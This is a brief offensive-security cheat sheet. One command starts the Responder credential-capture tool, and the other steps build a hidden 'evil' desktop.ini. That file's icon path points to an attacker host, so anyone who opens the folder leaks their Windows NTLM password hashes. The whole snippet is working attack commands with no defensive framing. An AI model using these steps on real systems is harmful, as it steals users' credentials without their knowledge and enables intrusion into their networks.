# responder
sudo python Responder.py -I tun0



---
# Evil desktop.ini to collect hashes
mkdir secrets
attrib +s secrets
cd secrets
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\responder.local\poc >> desktop.ini
attrib +s +h desktop.ini

---